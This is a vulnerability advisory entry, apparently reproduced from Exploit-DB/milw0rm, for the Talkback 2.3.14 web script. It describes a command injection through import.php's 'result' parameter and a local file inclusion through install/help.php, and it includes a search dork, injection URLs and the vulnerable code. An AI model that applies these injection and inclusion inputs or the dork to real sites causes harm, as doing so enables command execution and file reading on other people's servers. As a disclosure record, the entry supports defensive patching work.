Talkback V 2.3.14

vendor:

Talkback

by:

milw0rm.com

9,3

CVSS

HIGH

Command Injection

CWE

Product Name: Talkback

Affected Version From: 2.3.14

Affected Version To: 2.3.14

Patch Exists: YES

Related CWE: N/A

CPE: a:oldguy:talkback:2.3.14

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The Talkback V 2.3.14 script is vulnerable to command injection. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'result' parameter in the 'talkback/addons/import.php' script. An attacker can exploit this vulnerability to execute arbitrary commands on the vulnerable system with the privileges of the web server process.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

JIKO No-exploit.Com
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
        Code;
        $last_line = system($command, $result);
Local File ~[+]
        Note : if floder install not deleted
http://localhost/test/talkback/install/help.php?language=[File]
    code;
        $file = "../language/{$_REQUEST['language']}.php";
    if (!is_file($file))
        exit("Language file '$file' does not exist");
    include ($file);

# milw0rm.com [2009-07-09]